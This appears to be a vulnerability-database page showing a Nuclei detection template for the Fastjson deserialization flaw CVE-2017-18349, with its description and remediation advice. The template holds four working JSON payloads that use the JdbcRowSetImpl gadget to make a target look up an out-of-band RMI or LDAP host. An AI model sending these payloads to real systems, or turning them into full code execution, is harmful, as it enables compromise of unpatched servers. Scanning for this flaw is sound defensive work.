Vulners
Lucene search
Fastjson Insecure Deserialization - Remote Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Exploit for Improper Input Validation in Alibaba Fastjson | 29 May 202609:40 | – | githubexploit |
 | CVE-2017-18349 | 23 Dec 202400:00 | – | circl |
 | Pippo FastjsonEngine Fastjson Arbitrary Code Execution Vulnerability | 24 Oct 201800:00 | – | cnvd |
 | CVE-2017-18349 | 23 Oct 201820:00 | – | cve |
 | CVE-2017-18349 | 23 Oct 201820:00 | – | cvelist |
 | EUVD-2026-1694 | 9 Jan 202606:43 | – | euvd |
 | Improper Input Validation in alilibaba:fastjson | 24 Oct 201819:42 | – | github |
 | Improper Input Validation | 23 Oct 201800:00 | – | gitlab |
 | CVE-2017-18349 | 23 Oct 201820:29 | – | nvd |
 | GHSA-XJRR-XV9M-4PW5 Improper Input Validation in alilibaba:fastjson | 24 Oct 201819:42 | – | osv |
10
id: CVE-2017-18349
info:
name: Fastjson Insecure Deserialization - Remote Code Execution
author: night
severity: critical
description: |
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
impact: |
Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
remediation: |
Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`.Implement strict whitelist filtering for `@type` annotations, validate and sanitize all JSON input.Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-18349
- https://github.com/alibaba/fastjson/wiki/security_update_20170315
- https://github.com/pippo-java/pippo/issues/466
- https://github.com/h0cksr/Fastjson--CVE-2017-18349-
- https://fortiguard.com/encyclopedia/ips/44059
- https://www.exploit-db.com/exploits/45983
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-18349
cwe-id: CWE-20
epss-score: 0.3897
epss-percentile: 0.98402
cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: alibaba
product: fastjson
tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev,vuln
variables:
rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"
http:
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{rmi_payload}}",
"autoCommit": true
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
- "{{BaseURL}}/parse"
- "{{BaseURL}}/deserialize"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{ldap_payload}}",
"autoCommit": true
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
- "{{BaseURL}}/parse"
- "{{BaseURL}}/deserialize"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"data": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{rmi_payload}}",
"autoCommit": true
}
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{ldap_payload}}",
"autoCommit": true
}
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
# digest: 490a0046304402202855c4107e1bcf4d0b8d558a83757aa90df1be0be2e9aff614e962f65f051ebc022077aa48f3e9aa9f1125d0cc7f59dbcf81cd44cbba15f4169f01eff7976dda9238:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 39.8
CVSS 210
EPSS0.3897